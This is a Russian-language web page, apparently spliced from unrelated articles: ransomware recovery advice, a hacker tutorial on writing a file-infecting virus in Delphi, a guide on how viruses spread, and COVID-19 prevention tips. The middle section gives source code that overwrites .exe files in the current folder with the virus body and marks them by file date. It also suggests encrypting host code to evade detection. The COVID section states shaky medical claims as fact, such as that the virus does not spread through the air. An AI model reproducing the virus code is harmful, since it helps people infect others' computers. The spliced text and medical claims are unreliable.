Как заразить вирусом doc

Как только троян-вымогатель / шифровальщик попадает в вашу систему, уже поздно пытаться спасти несохраненные данные. Удивительно, но многие киберпреступники не отказываются от своих обязательств после оплаты выкупа и действительно восстанавливают ваши файлы. Конечно, никто гарантий вам не даст. Всегда есть шанс, что злоумышленник заберет деньги, оставив вас наедине с заблокированными файлами.

Тем не менее, если вы столкнулись с заражением шифровальщиком, не стоит паниковать. И даже не думайте платить выкуп. Сохраняя спокойствие и хладнокровие, проделайте следующие шаги:

Строго рекомендуется удалить заражение в безопасном режиме без сетевых драйверов. Существует вероятность того, что шифровальщик мог взломать ваше сетевое подключение.

Удаление вредоносной программы является важным шагом решения проблемы. Далеко не каждая антивирусная программа сможет справится с очисткой. Некоторые продукты не предназначены для удаления данного типа угроз. Проверьте, поддерживает ли ваш антивирус данную функцию на официальном сайте или связавшись со специалистом технической поддержки.

Основная проблема связана с тем, что файлы остаются зашифрованы даже после полного удаления вредоносного заражения. Тем нем менее, данный шаг как минимум избавит вас от вируса, который производит шифрование, что обеспечит защиту от повторного шифрования объектов.

Попытка расшифровки файлов без удаления активной угрозы обычно приводит к повторному шифрованию. В этом случае вы сможете получить доступ к файлам, даже если заплатили выкуп за инструмент дешифрования.

Опять же, вы должны сделать все возможное, чтобы избежать оплаты выкупа. Следующим шагом станет применение бесплатных инструментов для расшифровки файлов. Обратите внимание, что нет гарантий, что для вашего экземпляра шифровальщика существует работающий инструмент дешифрования. Возможно ваш компьютер заразил зловред, который еще не был взломан.

“Лаборатория Касперского”, Avast, Bitdefender, Emsisoft и еще несколько вендоров поддерживают веб-сайт No More Ransom!, где любой желающий может загрузить и установить бесплатные средства расшифровки.

Первоначально рекомендуется использовать инструмент Crypto Sheriff, который позволяет определить ваш тип шифровальщика и проверить, существует ли для него декриптор. Работает это следующим образом:

Crypto Sheriff обработает эту информацию с помощью собственной базы данных и определит, существует ли готовое решение. Если инструменты не обнаружены, не стоит отчаиваться. Одни из декрипторов все-равно может сработать, хотя вам придется загрузить и протестировать все доступные инструменты. Это медленный и трудоемкий процесс, но это дешевле, чем платить выкуп злоумышленникам.

Следующие инструменты дешифрования могут расшифровать ваши файлы. Нажмите ссылку (pdf или инструкция) для получения дополнительной информации о том, с какими вымогателями работает инструмент:

Количество доступных декрипторов может изменяться с течением времени, мы будем регулярно обновлять информацию, проверяя веб-сайт No More Ransom!

Запустить средство дешифрования файлов совсем несложно. Многие утилиты поставляются с официальной инструкцией (в основном это решения от Emsisoft, Kaspersky Lab, Check Point или Trend Micro). Каждый процесс может немного отличаться, поэтому рекомендуется предварительно ознакомиться с руководством пользователя.

Рассмотрим процесс восстановления файлов, зашифрованных трояном-вымогателем Philadelphia:

  • Выбираем один из зашифрованных файлов в системе и файл, который еще не был зашифрован. Помещает оба файла в отдельную папку на компьютере.
  • Загружает средство дешифрования Philadelphia и перемещаем его в папку с нашими файлами.
  • Выбираем оба файла и перетаскиваем их на иконку исполняемого файла декриптора. Инструмент запустит поиск правильных ключей для дешифрования.

  • Данный процесс может занять приличное время в зависимости от сложности угрозы.
    • После завершения работы, вы получите ключ дешифрования для восстановления доступа ко всем заблокированным шифровальщикам файлам.

    • Затем нужно принять лицензионное соглашение и выбрать варианты расшифровки. Вы можете изменить местоположение объектов и опционально сохранить зашифрованные версии.
    • В конечном итоге появится сообщение об успешном восстановлении файлов.

    Повторимся, что данный процесс не сработает, если для вашего конкретного экземпляра шифровальщика не существует декриптора. Так как многие пользователи предпочитают заплатить выкуп, а не искать альтернативные способы решения проблемы, даже взломанные шифровальщики активно используются киберпреступниками.

    Шаги 1 и 2 будут эффективны только при совместном использовании. Если они не помогут, то используйте следующие рекомендации.

    Надеемся, что у вас есть рабочая резервная копия данных. В этом случае даже не стоит задумываться об оплате выкупа – это может привести к более серьезным последствиям, чем ущерб от первичного заражения.

    Самостоятельно или делегировав задачу системному администратору, выполните полный сброс системы и восстановите ваши файлы из резервной копии. Защита от действия шифровальшиков – это важная причина использования инструментов резервного копирования и восстановления файлов.

    Пользователи Windows могут использовать полный сброс системы до заводских настроек. На официальном сайте Microsoft доступны рекомендации по восстановлению зашифрованных троянами файлов.

    HLLO- High Level Language Overwrite. Такой вирус перезаписывает программу своим телом. Т.е.
    программа уничтожается, а при попытке запуска программы пользователем- запускается вирус и "заражает" дальше.

    HLLC- High Level Language Companion. Большинство таких вирусов от-носятся к седой древности (8-10 лет назад), когда у пользователей стоял ДОС и они были очень ленивы. Эти вирусы ищут файл, и не изменяя его, создают свою копию, но с расширением .COM. Если ленивый пользователь пишет в командной строке только имя файла, то первым ДОС ищет COM файл, запуская вирус, который сначала делает свое дело, а потом запускает ЕХЕ файл. Есть и другая модификация
    HLLC - более современная (7 лет ;)): Вирус переименовывает файл, сохраняя имя, но меняя расширение- с ЕХЕ на, допустим, OBJ или MAP. Своим телом вирус замещает оригинальный файл. Т.е. пользователь запускает вирус, который, проведя акт размножения, запускает нужную программу- все довольны.

    HLLP- High Level Language Parasitic. Самые продвинутые. Приписывают свое тело к файлу спереди (Первым стартует вирус, затем он восстанавливает программу и запускает ее) или сзади
    - тогда в заголовок проги мы пишем jmp near на тело вируса, все-таки запускаясь первыми.

    Саму же программу мы можем оставить в неизменном виде, тогда это будет выглядеть так:

    MZТело злобного вируса
    MZКод программы

    Что такое MZ, я думаю, ты догадался 🙂 Это же инициалы твоего любимого Марка Збиковски, которые он скромно определил в сигнатуру exe файла 🙂 А вписал я их сюда только для того, чтобы ты понЯл
    - заражение происходит по принципу copy /b virus.exe program.exe, и никаких особых приколов тут нет. Сейчас нет. Но мы их с тобой нафигачим
    - будь здоров :). Ну, например: можно первые 512 или больше байт оригинальной программы зашифровать любым известным тебе алгоритмом- XOR/XOR, NOT/NOT, ADD/SUB, тогда это будет выглядеть как:

    MZтело злобного вируса
    XORed часть ориг. проги
    Неизменная часть ориг. проги

    В этом случае структура зараженного файла не будет так понятна.
    Я не зря тут (в классификации, в смысле) так распинаюсь
    - parasitic-алгоритм используют 90% современных вирусов, независимо от их способа распространения. Ладно, идем дальше:

    Сетевой вирус. Может быть любым из перечисленных. Отличается тем, что его распространение не
    ограничивается одним компом, эта зараза каким-либо способом лезет через инет или локальную сеть на другие машины. Я думаю, ты регулярно выносишь из мыльника 3-4 таких друга
    - вот тебе пример сетевого вируса. А уж попав на чужой комп, он заражает файлы произвольным образом, или не заражает ВООБЩЕ.

    Макро вирусы, скриптовые вирусы, IRC вирусы. В одну группу я определил их потому, что это вирусы, написанные на языках, встроенных в приложения (MSOffice :)), скриптах (тут рулит твой любимый VBS) и IRC скриптах. Строго говоря, как только в каком-то приложении появляется достаточно мощная (и/или дырявая) скриптовая компонента, на ней тут же начинают писать вирусы 😉 Кстати, макро вирусы очень просты и легко определяются эвристикой.

    Дошли 🙂 Давай, запускай дельфи, убивай всякие окошки и вытирай из окна проекта всю чушь. То есть вообще все вытирай 🙂 Мы будем работать только с DPRом, содержащим:

    program EVIL_VIRUS;
    USES WINDOWS,SYSUTILS;
    begin
    end;

    Логику вируса, я думаю, ты уже понял из классификации- восстанавливаем и запускаем прогу--> ждем завершения ее работы--> стираем "отработавший файл" (забыл сказать- мы НЕ ЛЕЧИМ зараженную прогу, мы переносим оригинальный код в левый файл и запускаем его. ПРИМЕР: Зараженный файл NOTEPAD.EXE. Создаем файл _NOTEPAD.EXE в том же каталоге с оригинальным кодом, и запускаем уже его).--> ищем незараженное файло и заражаем. Это все 🙂 Базовая конструкция вируса выглядит именно так.

    Объяви теперь для своего могучего мозга следующие переменные и константы:

    VaR VirBuf, ProgBuf, MyBuf : array of char;
    SR : TSearchRec;
    My,pr : File;
    ProgSize,result : integer;
    PN,st : String;
    si : Tstartupinfo;
    p :Tprocessinformation;
    infected : boolean;
    CONST VirLen: longint= 1000000;

    Первой строчкой идут динамические массивы, в которые мы будем писать соответственно тело вируса и программы; В переменную SR запишутся
    характеристики найденного файла-кандидата на заражение (надеюсь, ты знаком с процедурами FindFirst и FindNext, потому что дальше будет хуже ;)), My и
    Pr - это файл, откуда мы стартовали и левый файл с оригинальным кодом программы (я про него уже писал выше). result- результат работы FindFirst, он должен быть равен нулю,
    ProgSize - размер кода программы. Остальное ясно из дальнейшего, кроме
    infected - это признак зараженности найденного файла и
    VirLen- это длина кода вируса, ее ты узнаешь только после свадьбы. Тьфу, я хотел сказать, после компиляции. Т.е. компилируешь, меняешь значение константы в исходнике и перекомпилируешь.
    Кодим далее 🙂 Здесь ты видишь код, ответственный за восстановление и запуск зараженной программы:

    SetLength (virbuf,VirLen);
    AssignFile (my,ParamStr(0));
    st:= paramstr(0);
    St:= st+#0;
    CopyFile (@st[1],'c:\windows\program.exe',false);
    IF FileSize (my)> VirLen then
    begin
    //Запуск программы
    AssignFile (my,'c:\windows\program.exe);
    Reset (my);
    ProgSize:= FileSize(my)-VirLen;
    BlockRead (my,virbuf,virlen);
    SetLength (progbuf,pRogSize);
    BlockRead (my,progbuf,progSize);
    CloseFile (my);
    PN:= '_'+ParamStr(0);
    AssignFile (pr,PN);
    ReWrite (pr);
    BlockWrite (pr,progbuf,progSize);
    CloseFile (pr);
    FillChar( Si, SizeOf( Si ) , 0 );
    with Si do
    begin
    cb := SizeOf( Si);
    dwFlags := startf_UseShowWindow;
    wShowWindow := 4;
    end;
    PN:= PN+#0;
    Createprocess(nil,@PN[1],nil,nil,false,Create_default_error_mode,nil,nil,si,p);
    Waitforsingleobject(p.hProcess,infinite);
    //Запустили, программа отработала. Сотрем ее 🙂
    ErAsE (pr);
    Erase (my);

    Тут все, в принципе просто и понятно, кроме того, зачем я перенес весь зараженный файл в каталог к виндам и что делают строчки с 3 по 5 включительно.
    А сделал я это потому, что читать из запущенного файла некомфортно и возможно только с использованием CreateFile и ReadFile WinAPI. Про кодинг на WinAPI я расскажу позднее, сейчас я разберу только основы
    - на Delphi.

    Строчки эти - преобразование string в pchar народным методом, поскольку мы сейчас боремся за каждый байт кода. Еще момент: я поступил некорректно, задав путь c:\windows так жестко. Пользуйся лучше процедурой GetWindowsDirectory, узнай точно 🙂 Все остальное понятно без всяких комментариев (если нет
    завязывай прогуливать информатику ;)), идем дальше:

    result:= FindFirst ('*.exe',faAnyFile,sr);
    WHILE Result= 0 DO
    begin
    //Проверка на вшивость
    Infected:= false;
    IF DateTimeToStr (FileDateToDateTime (fileage (sr.name)))= '03.08.98 06:00:00' then infected:= true;
    //Проверено!
    IF (infected= false)and (sr.name<>paramstr(0)) then
    begin
    AssignFile (my,sr.Name);
    ReWrite (my);
    BlockWrite (my,virbuf,virlen);
    BlockWrite (my,progbuf,sr.Size);
    CloseFile (my);
    FileSetDate (sr.Name,DateTimeToFileDate(StrToDateTime ('03.08.98 06:00:00')));
    end;
    end;

    //Если вир запущен "чистым", т.е. не из зараженной про-граммы, то завершаемся
    end else halt;

    Что же твой зоркий глаз видит тут? Правильно, процедура FindFirst ищет нам заданную жертву (любой exe файл из текущего каталога), передает его характеристики в переменную SR. Затем необходимо его проверить на зараженность. Это делается оригинально: при заражении файлу присваивается опр. дата и время. И любой файл с такими характеристиками считается зараженным. Все остальное опять же нецензурно просто, поэтому я плавно перехожу к заключению 🙂

    Вот мы и накодили наш первый вирус. Пока он умеет только заражать файлы в текущем каталоге (хотя, я уверен, ты его легко модернизируешь ;)) и ничего не знает про другие каталоги и интернет. Не отчаивайся, мы его этому быстро обучим. Пока поиграйся с этими строчками, и жди следующей статьи.

    Рискну дать тебе описание всех процедур, использованных в статье. Это поможет тебе искать их в хелпе и подготовиться к кодингу серьезных вирусов с использованием
    WinAPI.

    AssignFile - в WinAPI нет аналога - сопоставляет файл
    с переменной типа File или TextFile

    Reset - аналоги _lopen и CreateFile - открывает
    существующий файл и устанавливает позицию
    чтения в начало

    ReWrite - _lcreate и CreateFile - создает новый файл и
    уст. позицию чтения в начало. Если скормить
    ReWrite существующий файл, его содержимое
    будет обнулено

    BlockRead - _lread и ReadFile - читает в буфер
    определенное количество данных из файла

    BlockWrite - _lwrite и WriteFile - соответственно, пишет
    данные в файл

    SeekFile - _llseek и SetFilePointer - перемещает позицию
    чтения/записи в открытом файле

    CloseFile - _lclose и CloseHandle - закрывает открытый
    файл

    Erase - DeleteFile - удаление файла

    FindFirst - FindFirstFile - поиск файла по критериям

    FindNext - FindNextFile - поиск следующего файла

    Мы разоблачили много лохотронов, которые вымогают деньги, обещая крупный приз или зарплату. Но во всех этих случаях человек сам принимает решение, поверить мошеннику и своими руками отдать ему деньги или убежать от этого сайта подальше. Однако некоторые сайты или спам-сообщения могут быть просто вредоносными. Как вирусы попадают на компьютер и как они распространяются, читайте в нашей полезной статье.

    Как вирусы проникают на компьютер


    Вирусы проникают в компьютер тремя путями:

    1. Через интернет
    2. Через съёмный носитель
    3. Через локальную сеть

    Начнём с конца. Это в основном касается корпоративных компьютеров, за безопасностью которых следят сисадмины. Если на работе ваше устройство подключено к общей локальной сети и хотя бы один компьютер заразится вирусом, то инфицируются и другие. Это как дети в детском садике: заболел один — карантин на всю группу.

    Чтобы вирус проник на домашний компьютер, достаточно вставить в него флешку (чужую или свою, но побывавшую в другом заражённом компьютере), CD-диск или просто подключить через USB-порт какое-нибудь внешнее устройство (смартфон, фотоаппарат, внешний жёсткий диск и т.п.). Если этот съёмный носитель оказался заражённым вирусом, при открытии устройства на вашем компьютере автозапуск может открыть его даже без вашего ведома. Это всё равно что передать игрушку от больного каким-нибудь ротовирусом другому ребёнку.

    И наконец, заражение через интернет. Это, пожалуй, самый распространённый и многоканальный путь распространения компьютерных вирусом. Рассмотрим подробнее, как можно заразиться вирусом через интернет.

    Каким образом вирус заражает компьютер через интернет?

    В интернете на различных ресурсах блуждают миллионы вирусов. Каждый день появляются всё новые и новые виды. Их создают обычные люди, точнее необычно умные и крайне вредные, но всё же люди, а не роботы. Кто-то делает это с целью вымогательства денег или получения прибыли, кто-то ради спортивного интереса, чтобы войти в историю, кто-то просто злодей от природы и хочет навредить всему человечеству.

    Рассмотрим, как происходит заражение компьютерным вирусом, какими путями вы можете получить вирус на свой компьютер.


    Однако чтобы написать такую программу, которая будет запускать себя с браузера, очень сложно, поэтому чаще всего вредоносными являются не сами сайты, а программы на них, которые вы можете случайно или намеренно скачать и открыть на своём компьютере. Часто такие программы маскируются под ссылки, картинки, файлы-вложения или какие-то другие знакомые программы. Например, вы ищите книжку, нажимаете на “скачать” и скачиваете не doc, txt, pdf или что-то похожее, а exe, com или вообще файл с каким-то непонятным расширением (скорее всего такой файл заражен вирусом). Не обратив на это внимание, вы открываете файл на своём компьютере и своими руками запускаете вирус. Либо вы скачивате искомый файл, а параллельно с ним закачивается и вредоносная программа, которую вы даже не заметили.

    Вирус в самом письме или во вложениях в нём. Вам приходит письмо от неизвестного отправителя, вы открываете его, переходите по ссылке в нём или скачиваете и открываете вложения, в которых спрятался вирус. На самом деле письмо может прийти и от известного отправителя. Например, если вашего друга заразил особый вирус, который рассылает себя всем, кто есть в его адресной книге. Или же вирус маскирует отправителя под известную фирму. Так он вызывает доверие, и человек не задумываясь, открывает письмо.

    Рассыльщики таких писем хорошо разбираются в психологии масс и поэтому пишут такие темы и тексты писем, что очень сложно устоять и не открыть их и не выполнить указания. Например, “с вашего счёта списано 5673 р.”, или “счёт к оплате за вашу покупку”, или “добро пожаловать в аккаунт”, или “вы зарегистрировались на портале”, или “транзакция №34598657 выполнена. Ваш счёт пополнен” и т.п.


    Недавно мне, например, приходили письма от Мегафона о том, что мне на счёт зачислены какие-то деньги. Я написала письмо в поддержку Мегафона с вопросом, что это. Мне ответили, что это не они отправляли и что это мошенники, не открывайте их письма и вложения в них.


    Рассылка вирусов по email очень прибыльное и неслжное дело. Оно сродни одностраничным сайтам лохотронов. Существует целая индустрия: на специальных сайтах вы можете скачать вредоносные программы (вирусы-вымогатели, взломщики паролей и аккаунтов и т.п.) и делать такие вот рассылки, рассчитывая “на лоха”. Например, если вы наберёте в гугл запрос “Набор хакера скачать”, то удивитесь, как же просто скачать вирус для его распространения.


    Пример сайта, где можно скачать вирусы-взломщики

    Вирус — программа — компьютер. Вы скачиваете из интернета необходимое вам ПО, которое заражено вирусом. Чаще всего это касается бесплатных программ на неофициальных сайтах. Например, программа для просмотра видео, для скачивания музыки из вконтакте, для архивирования, монтажа, спам-рассылки и т.п. Здесь как и с любым непроверенным файлом, скачанным с плохого сайта: вы скачиваете одно, а запускаете параллельно какое-то другое вредоносное ПО.

    Однако вирусы могут содержаться и в официальном программном обеспечении и обновлениях, которые ваш компьютер скачивает автоматически и устанавливает без вашего ведома. Такое происходит не часто, но зато очень массово. Например, предположительно так распространялся известный вирус-вымогатель “Petya”: им было заражено обновление для бухгалтерской программы M.E.Doc.

    Здесь сразу 2 варианта: через личные сообщения и через установку приложений. Неизвестный вам человек (или известный, но взломанный) пишет вам интригующее личное сообщение. Там ссылка или даже вложение. Вы переходите или скачиваете, запускаете и всё по сценарию как с электронными письмами и вредоносными сайтами.

    Другой вариант — вы устанавливаете какое-нибудь полулегальное приложение, типа “посмотреть, кто заходил на твою страничку”, или “скачивать музыку бесплатно”, или “открыть закрытый список друзей друга”, и тем самым закачиваете себе и вирус. Правда, в соцсетях чаще всё-таки не вирусы рассылают, а всеми способами пытаются украсить ваш пароль и захватить ваш аккаунт, чтобы делать вредоносные рассылки вашим друзьям.

    Как не поймать вирус и как защититься от вируса?


    Везде можно подхватить вирус. Но волков бояться — в лес не ходить. Компьютерная безопасность — это очень важно особенно для людей, работающих в интернете. Как же защититься от вирусов? Вот несколько важных правил, как обезопасить свою работу с компьютером:

    1. Антивирус. Прежде всего, конечно же установить хороший антивирус и дать ему возможность обновляться хоть каждый день. Он, конечно, тормозит работу компьютера, но зато сразу распознает известный ему вирус или укажет вам на подозрительный объект, будь то скачанный файл, вставленный съёмный носитель или папки на вашем жёстком диске.

    2. Не открывать, не нажимать, не скачивать. Большинство вирусов приходят на компьютер по вине самого хозяина. Когда человек видит что-то интригующее или находит то, что давно искал, он теряет бдительность, надеется на авось и сам скачивает себе на компьютер вирус. Так что не открывайте писем от неизвестных отправителей, не переходите по непонятным ссылкам, не кликайте все подряд баннеры, не скачивайте вложений и непроверенных приложений. Всегда будьте на чеку, если вам предлагается файл с расширением exe или com. Это запускные файлы, которые могут содержать в себе вирус.

    4. Установите Linux. Большинство вирусов подстраиваются под Windows, поэтому чтобы не бояться переходить по ссылкам на вредоносные сайты, установите другую операционную систему, например, Линукс.

    5. Измените настройки браузера. Установите, чтобы браузер всегда спрашивал вашего разрешение на скачивание файлов, а также запретите автозапуск программ.


    Работая в интернете, мы часто сталкиваемся с различными мошенниками, будь то лохотронщики, которые пытаются выманить у вас деньги, или хакеры, которые пытаются выманить ваши пароли. Поэтому всегда будьте бдительны. Надеемся, наши советы помогут вам в этом.

    Если вам нравятся наши статьи, подписывайтесь на рассылку и получайте небольшой бонус от команды детективов.

    Виктор Малеев – признанный эксперт в области эпидемиологии и клиники инфекционных болезней с более чем полувековым опытом работы в этом направлении. Академик РАН и инфекционист Виктор Малеев работал в очагах опасных инфекций – таких как холеры, чумы, сибирской язвы, риккетсиозов, геморрагических лихорадок, атипичной пневмонии. Именно Виктор Васильевич Малеев помогал в Гвинее местным врачам предотвращать эпидемию вируса Эбола и консультировал эпидемиологов США в связи с угрозой эпидемии сибирской язвы.

    Эксперт поделился с читателями "Комсомолки" своими правилами профилактики новой болезни - коронавируса. Приводим их полностью от первого лица.


    Академик РАМН, ученый-микробиолог, доктор медицинских наук Виктор Малеев. Фото: Николай Галкин/ТАСС

    ЧТО Я ДЕЛАЮ В СВЯЗИ С ПРИБЛИЖАЮЩЕЙСЯ ПАНДЕМИЕЙ КОРОНАВИРУСА COVID-19

    Наверняка многие меня знают – как специалиста, всю жизнь занимающегося инфекциями: эпидемиозвратный тиф, работал на холере, чуме, лихорадке Ласса. Я был одним из первых, кто отправился в Гвинею в 2014 г. в самый эпицентр эпидемии вируса Эболы и в 2002 году поехал в Китай на эпидемию атипичной пневмонии (SARS). Так что я не понаслышке знаю, что это такое. Я работал во всех крупных очагах опасных инфекций по всему миру - видел лепру, трахому, и как ей можно противостоять. Много лет я был главным инфекционистом России и сейчас, когда вспышка коронавирусной инфекции достигла пандемии, не могу оставаться в стороне.

    В России удается сдерживать распространение коронавирусной инфекции благодаря предпринятому целому комплексу противоэпидемических мер. И нам удастся ее удержать, если каждый человек будет предпринимать меры предосторожности. Они простые, но эффективные, практически такие же, какие мы используем во время эпидемии гриппа и ОРВИ.


    Распространение коронавирусной инфекции в России можно сдержать, соблюдая несложные правила. Фото: Сергей Бобылев/ТАСС

    1) НИКАКИХ РУКОПОЖАТИЙ!

    Используйте другие способы для приветствия – кивок или улыбка.


    Россиянам на время эпидемии коронавируса следует воздерживаться от рукопожатий. Фото: GLOBAL LOOK PRESS

    2) ИЗБЕГАЙТЕ КОНТАКТОВ!

    Дотрагивайтесь до любых поверхностей только тыльной стороной руки – до выключателей света, кнопок в лифте.


    Кнопки лифтов и ручки дверей относятся к потенциально опасным контактным поверхностям. Фото: EAST NEWS

    Дверь открывать лучше или локтем, или бедром. Если, чтобы открыть дверь, необходимо взяться за ручку, делайте это в перчатках. Особенно важно для туалетов и дверей в публичных местах.

    3) ДЕЗИНФЕКЦИЯ

    В магазинах обязательно используйте дезинфицирующие салфетки, чтобы протереть ручки и детские сидения в продуктовых тележках.


    Возьмите в привычку пользование дезинфицирующими салфетками и растворами. Фото: EAST NEWS

    Возьмите за правило протирать руки дезинфицирующим раствором, когда входите в квартиру или садитесь в машину. Используйте его всякий раз после заправки или прикосновения к другим загрязненным предметам, когда вы не можете сразу же вымыть руки.

    4) МОЙТЕ РУКИ С МЫЛОМ

    Делайте это в течение 10–20 секунд и / или используйте дезинфицирующее средство для рук на спиртовой основе, содержащее более 60% спирта всякий раз, когда вы возвращаетесь домой из ЛЮБОГО места, где были другие люди.


    Тщательно мойте руки с мылом, не менее 10 секунд. Фото: GLOBAL LOOK PRESS

    5) ИСПОЛЬЗУЙТЕ ОДНОРАЗОВЫЕ САЛФЕТКИ

    Если возможно, кашляйте или чихайте в одноразовую салфетку и СРАЗУ выбрасывайте ее. Используйте свой локоть, только если нет другой возможности. Одежда на вашем локте будет содержать инфекционный вирус, который может передаваться до недели и более!


    При кашле или чихании используйте одноразовые салфетки. Фото: Иван ПРОХОРОВ

    6) ОСТАВАЙТЕСЬ ДОМА

    Если почувствовали недомогание, если у вас температура, симптомы респираторной инфекции – не надо геройствовать. Оставайтесь дома и не подвергайте дополнительному риску ни себя, ни окружающих людей!


    Почувствовав недомогание, оставайтесь дома. Фото: Олег УКЛАДОВ

    Важные замечания:

    Коронавирус парализовал север Италии.По числу заболевших Италия поставила печальный рекорд и вышла на первое место в Европе

    Этот вирус распространяется крупными каплями при кашле и чихании. Это означает, что воздух не заразит вас!

    Коронавирус против человечества: новые инфекции усиливают наш иммунитет

    Но все поверхности, где эти капельки остаются, заразны в среднем в течение недели. Поэтому все, что связано с инфицированными людьми, будет заражено и потенциально заразно.

    Вирус находится на поверхности, и вы не заразитесь, если на ваше незащищенное лицо никто не будет прямо кашлять или чихать.

    Этот вирус имеет только клеточные рецепторы для клеток легких (он поражает только ваши легкие). Единственный путь заражения вирусом - попадание через нос или рот с вашей руки, кашель или чихание зараженного в ваш нос или рот.

    Что необходимо иметь при себе:

    - Дезинфицирующие средства для рук. Эти средства должны быть на спиртовой основе и содержать более 60% спирта, чтобы быть эффективными.

    ВОЗ объявила пандемию нового коронавируса в мире.

    - Одноразовые хирургические маски. Используйте их, чтобы не дотронуться до носа и / или рта (мы дотрагиваемся до носа / рта 90 раз в день, не зная об этом!).


    Это единственный способ, которым этот вирус может заразить вас - он специфичен для легких.

    Маска не предотвратит попадание вируса при прямом чихании в нос или рот - она только защитит вас от прикосновения к носу или рту.

    Я надеюсь, что мы сможем сдержать дальнейшее распространение коронавируса и постепенно начнется его спад. Поскольку это новый для человека вирус, у нас нет иммунитета от него. В мире предпринимается масса усилий для понимания геномики, структуры, вирулентности, других особенностей этого вируса. Ищутся методы борьбы с ним. Многие научные институты работают над созданием вакцины и лекарства от COVID-19, Россия тоже.

    Но пока этого нет, остаются только симптоматические меры профилактики.

    Давайте им следовать!

    А у тебя есть маска?.Маски - хит сезона. Всё из-за коронавируса А у тебя есть маска?

    ЧИТАЙТЕ ТАКЖЕ

    Пандемия коронавируса: Как не поддаться панике, слушая новости

    Почему коронавирус с особой силой ударил по Италии, и какая судьба ждет другие страны Евросоюза

    Эксперт по международному здравоохранению рассказал, от чего зависит масштаб и тяжесть вспышки коронавирусной инфекции в той или иной стране (подробности)

    Читайте также:

    Пожалуйста, не занимайтесь самолечением!
    При симпотмах заболевания - обратитесь к врачу.